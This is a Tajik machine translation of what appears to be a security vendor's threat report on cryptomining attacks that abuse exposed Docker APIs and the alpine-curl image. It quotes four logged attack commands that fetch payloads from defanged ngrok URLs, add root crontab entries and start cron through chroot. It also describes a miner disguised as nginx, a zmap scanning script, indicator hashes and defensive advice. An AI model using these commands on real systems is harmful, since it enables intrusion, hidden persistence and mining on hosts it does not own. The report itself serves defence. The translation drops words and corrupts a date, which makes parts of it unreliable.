Мо маълумоти ҷамъоваришударо бо истифода аз контейнерҳои асал, ки барои пайгирии таҳдидҳо офаридаем, таҳлил кардем. Ва мо фаъолияти назаррасро аз конканҳои номатлуб ё беиҷозати криптовалютӣ, ки ҳамчун контейнерҳои қаллобӣ бо истифода аз тасвири нашршудаи ҷомеа дар Docker Hub ҷойгир карда шудаанд, муайян кардем. Тасвир ҳамчун як қисми хидмате истифода мешавад, ки конканҳои cryptocurrency зарароварро мерасонад.
Илова бар ин, барномаҳои кор бо шабакаҳо барои ворид шудан ба контейнерҳо ва барномаҳои ҳамсояи кушода насб карда мешаванд.
Мо асалҳои худро тавре мегузорем, ки ҳаст, яъне бо танзимоти пешфарз, бе ягон чораи амниятӣ ё насби минбаъдаи нармафзори иловагӣ. Лутфан қайд кунед, ки Docker барои насби аввал тавсияҳо дорад, то аз хатогиҳо ва осебпазириҳои оддӣ пешгирӣ карда шавад. Аммо кӯзаҳои асал истифодашаванда контейнерҳо мебошанд, ки барои ошкор кардани ҳамлаҳо ба платформаи контейнерсозӣ пешбинӣ шудаанд, на барномаҳои дохили контейнер.
Фаъолияти шубҳаноки ошкоршуда низ назаррас аст, зеро он осебпазириро талаб намекунад ва инчунин аз версияи Docker мустақил аст. Ҷустуҷӯи тасвири нодурусти конфигуратсияшуда ва аз ин рӯ кушода, ҳама чизест, ки ҳамлагарон бояд ба бисёр серверҳои кушод сироят кунанд.
API-и пӯшидаи Docker ба корбар имкон медиҳад, ки доираи васеи , аз ҷумла гирифтани рӯйхати контейнерҳои коркунанда, гирифтани гузоришҳо аз як контейнери мушаххас, оғоз кардан, қатъ кардан (аз ҷумла маҷбурӣ) ва ҳатто сохтани контейнери нав аз тасвири мушаххас бо танзимоти муайян.
Дар тарафи чап усули интиқоли нармафзори зараровар аст. Дар тарафи рост муҳити ҳамлакунанда мавҷуд аст, ки имкон медиҳад дурдасти тасвирҳо паҳн карда шавад.
Тақсим аз рӯи кишвар аз 3762 API-и кушодаи Docker. Дар асоси ҷустуҷӯи Шодан аз 12.02.2019/XNUMX/XNUMX
Вариантҳои занҷири ҳамла ва боркунии боркаш
Фаъолияти бадкасдона на танхо бо ёрии асал ошкор карда шуд. Маълумот аз Шодан нишон медиҳад, ки шумораи API-ҳои фошшудаи Docker (нигаред ба графики дуюм) пас аз таҳқиқи як контейнери нодуруст танзимшуда, ки ҳамчун пул барои ҷойгиркунии нармафзори истихроҷи cryptocurrency Monero истифода мешавад, афзоиш ёфтааст. Дар моҳи октябри соли гузашта (2018, маълумоти ҷорӣ тақрибан. тарчумон) танҳо 856 API кушода буданд.
Баррасии гузоришҳои асал нишон дод, ки истифодаи тасвири контейнер низ бо истифодаи , абзор барои таъсиси пайвастҳои бехатар ё интиқоли трафик аз нуқтаҳои дастрас ба суроғаҳо ё захираҳои муайяншуда (масалан localhost). Ин ба ҳамлагарон имкон медиҳад, ки ҳангоми интиқоли бор ба сервери кушода URL-ҳои динамикӣ эҷод кунанд. Дар зер намунаҳои рамзӣ аз гузоришҳо, ки сӯиистифода аз хидмати ngrok-ро нишон медиҳанд, оварда шудаанд:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Тавре ки шумо мебинед, файлҳои боршуда аз URL-ҳои доимо тағйирёбанда зеркашӣ карда мешаванд. Ин URL-ҳо мӯҳлати кӯтоҳ доранд, аз ин рӯ пас аз гузаштани мӯҳлат борҳоро зеркашӣ кардан мумкин нест.
Ду варианти боркунӣ вуҷуд дорад. Якум як конкани ELF тартибёфта барои Linux аст (бо Coinminer.SH.MALXMR.ATNO муайян карда шудааст), ки ба ҳавзи истихроҷи маъдан пайваст мешавад. Дуюм скрипт (TrojanSpy.SH.ZNETMAP.A) аст, ки барои ба даст овардани асбобҳои муайяни шабакавӣ, ки барои скан кардани диапазонҳои шабака истифода мешаванд ва сипас барои ҷустуҷӯи ҳадафҳои нав пешбинӣ шудаанд.
Скрипти dropper ду тағирёбандаро муқаррар мекунад, ки пас аз он барои ҷойгиркунии cryptocurrency истихроҷ истифода мешаванд. Тағйирёбандаи HOST URL-ро дар он ҷое, ки файлҳои зараровар ҷойгиранд, дар бар мегирад ва тағирёбандаи RIP номи файл (воқеан, хэш)-и конкани ҷойгиршаванда мебошад. Тағйирёбандаи HOST ҳар вақте, ки тағирёбандаи hash тағйир меёбад. Скрипт инчунин кӯшиш мекунад, ки тафтиш кунад, ки ягон конканҳои дигари cryptocurrency дар сервери ҳамла кор намекунанд.
Намунаҳои тағирёбандаҳои HOST ва RIP, инчунин порчаи код барои тафтиш кардани он ки ягон конканҳои дигар кор намекунанд
Пеш аз оғоз кардани конкан, он ба nginx номгузорӣ шудааст. Дигар версияҳои ин скрипт номи конканро ба дигар хидматҳои қонунӣ, ки метавонанд дар муҳити Linux мавҷуд бошанд, иваз мекунанд. Ин одатан барои аз рӯйхати равандҳои иҷрошаванда гузаштан кифоя аст.
Скрипти ҷустуҷӯ низ дорои хусусиятҳо мебошад. Он бо ҳамон хидмати URL барои ҷойгиркунии абзорҳои зарурӣ кор мекунад. Дар байни онҳо дуӣ zmap аст, ки барои скан кардани шабакаҳо ва гирифтани рӯйхати портҳои кушода истифода мешавад. Скрипт инчунин бинарии дигареро бор мекунад, ки барои ҳамкорӣ бо хидматҳои ёфтшуда ва гирифтани баннерҳо аз онҳо барои муайян кардани маълумоти иловагӣ дар бораи хидмати ёфтшуда (масалан, версияи он) истифода мешавад.
Скрипт инчунин баъзе диапазонҳои шабакаро барои скан пешакӣ муайян мекунад, аммо ин аз версияи скрипт вобаста аст. Он инчунин бандарҳои мавриди ҳадафро аз хидматҳо муқаррар мекунад - дар ин ҳолат, Docker - пеш аз анҷом додани скан.
Ҳамин ки ҳадафҳои имконпазир пайдо мешаванд, баннерҳо ба таври худкор аз онҳо хориҷ карда мешаванд. Скрипт инчунин ҳадафҳоро вобаста ба хидматҳо, барномаҳо, ҷузъҳо ё платформаҳои мавриди таваҷҷӯҳ филтр мекунад: Redis, Jenkins, Drupal, MODX, , муштарии Docker 1.16 ва Apache CouchDB. Агар сервери сканшуда ба яке аз онҳо мувофиқат кунад, он дар файли матнӣ захира карда мешавад, ки ҳамлагарон метавонанд баъдтар онро барои таҳлили минбаъда ва ҳакерӣ истифода баранд. Ин файлҳои матнӣ ба серверҳои ҳамлагарон тавассути истинодҳои динамикӣ бор карда мешаванд. Яъне барои ҳар як файл URL-и алоҳида истифода мешавад, яъне дастрасии минбаъда мушкил аст.
Вектори ҳамла тасвири Docker мебошад, ки онро дар ду қисмати коди оянда дидан мумкин аст.
Дар боло номгузорӣ ба хидмати қонунӣ аст ва дар поён ин аст, ки чӣ гуна zmap барои скан кардани шабакаҳо истифода мешавад
Дар боло диапазони шабакаҳои пешакӣ муайяншуда, дар поён портҳои мушаххас барои ҷустуҷӯи хидматҳо, аз ҷумла Docker мебошанд.
Скриншот нишон медиҳад, ки тасвири alpine-curl зиёда аз 10 миллион маротиба зеркашӣ карда шудааст
Дар асоси Alpine Linux ва curl, як воситаи самараноки CLI барои интиқоли файлҳо тавассути протоколҳои гуногун, шумо метавонед эҷод кунед . Тавре ки шумо дар тасвири қаблӣ мебинед, ин тасвир аллакай зиёда аз 10 миллион маротиба зеркашӣ шудааст. Шумораи зиёди зеркашиҳо метавонад маънои истифодаи ин тасвирро ҳамчун нуқтаи воридшавӣ дошта бошад; ин тасвир беш аз шаш моҳ пеш нав карда шуд; корбарон расмҳои дигарро аз ин репозитория зуд-зуд зеркашӣ намекарданд. Дар Docker - маҷмӯи дастурҳое, ки барои танзим кардани контейнер барои иҷро кардани он истифода мешаванд. Агар танзимоти нуқтаи воридшавӣ нодуруст бошад (масалан, контейнер аз Интернет кушода монда бошад), тасвирро метавон ҳамчун вектори ҳамла истифода бурд. Ҳамлагарон метавонанд онро барои интиқоли бор истифода баранд, агар онҳо контейнери нодуруст танзимшуда ё кушодаеро пайдо кунанд, ки дастгирӣ наёфта бошад.
Бояд қайд кард, ки худи ин тасвир (alpine-curl) зараровар нест, аммо тавре ки шумо дар боло мебинед, онро барои иҷрои вазифаҳои зараровар истифода бурдан мумкин аст. Тасвирҳои шабеҳи Docker инчунин метавонанд барои иҷрои амалҳои зараровар истифода шаванд. Мо бо Докер тамос гирифтем ва дар ин масъала бо онҳо кор кардем.
тавсияњои
бощимонда барои бисёр ширкатҳо, махсусан ширкатҳои амалӣ , ба тараккиёти босуръат ва расондани он нигаронида шудааст. Ҳама чиз бо зарурати риояи қоидаҳои аудит ва мониторинг, зарурати назорати махфияти маълумот, инчунин зарари азим аз риоя накардани онҳо бадтар мешавад. Ворид кардани автоматикунонии амният ба давраи коркард на танҳо ба шумо кӯмак мекунад, ки сӯрохиҳои амниятӣ пайдо кунед, ки дар акси ҳол метавонанд ошкор нашаванд, балки инчунин ба шумо кӯмак мекунад, ки сарбории кории нолозимро коҳиш диҳед, ба монанди иҷрои нармафзори иловагӣ барои ҳар як осебпазирии ошкоршуда ё конфигуратсияи нодуруст пас аз ҷойгиркунии барнома.
Ҳодисае, ки дар ин мақола баррасӣ шудааст, зарурати аз аввал ба назар гирифтани бехатариро таъкид мекунад, аз ҷумла тавсияҳои зерин:
- Барои маъмурони система ва таҳиягарон: Ҳамеша танзимоти API-и худро тафтиш кунед, то боварӣ ҳосил кунед, ки ҳама чиз танҳо барои қабули дархостҳо аз сервери мушаххас ё шабакаи дохилӣ танзим шудааст.
- Принсипи камтарин ҳуқуқҳоро риоя кунед: боварӣ ҳосил кунед, ки тасвирҳои контейнер имзо ва тасдиқ карда шудаанд, дастрасӣ ба ҷузъҳои муҳимро маҳдуд кунед (хидмати оғози контейнер) ва рамзгузорӣ ба пайвастҳои шабакавӣ илова кунед.
- Аз паи ва механизмҳои амниятро фаъол созанд, масалан. ва дарунсохт .
- Сканкунии автоматии вақти кор ва тасвирҳоро барои гирифтани маълумоти иловагӣ дар бораи равандҳои дар контейнер иҷрошаванда истифода баред (масалан, барои ошкор кардани қаллобӣ ё ҷустуҷӯи осебпазирӣ). Назорати барнома ва мониторинги якпорчагӣ ба пайгирии тағироти ғайримуқаррарӣ дар серверҳо, файлҳо ва минтақаҳои система кӯмак мекунад.
Trendmicro ба дастаҳои DevOps кӯмак мекунад, ки бехатар созанд, зуд паҳн кунанд ва дар ҳама ҷо оғоз кунанд. Trend Micro Амнияти пуриқтидор, соддакардашуда ва автоматиро дар тамоми лӯлаи DevOps созмон таъмин мекунад ва муҳофизати сершумори таҳдидҳоро таъмин мекунад барои ҳифзи сарбории ҷисмонӣ, виртуалӣ ва абрӣ дар вақти корӣ. Он инчунин амнияти контейнерро бо илова мекунад и , ки тасвирҳои контейнерии Docker-ро барои зараровар ва осебпазирӣ дар ҳама нуқтаи лӯлаи таҳия скан мекунад, то таҳдидҳоро пеш аз ҷойгиршавӣ пешгирӣ кунад.
Аломатҳои созиш
Хешҳои марбут:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Дар бораи он Нотикони таҷрибавӣ нишон медиҳанд, ки чӣ гуна танзимотро пеш аз ҳама бояд анҷом дод, то эҳтимолияти ба ҳадди ақал расонидан ё пурра пешгирӣ кардани рух додани вазъияти дар боло тавсифшуда. Ва рӯзҳои 19-21 август дар онлайн пуршиддат Шумо метавонед ин ва ба ин монанд мушкилоти амниятро бо ҳамкорон ва омӯзгорони таҷрибадор дар як мизи мудаввар муҳокима кунед, ки дар он ҳама метавонанд дард ва муваффақияти ҳамкасбони пуртаҷрибаро гӯш кунанд.
Манбаъ: will.com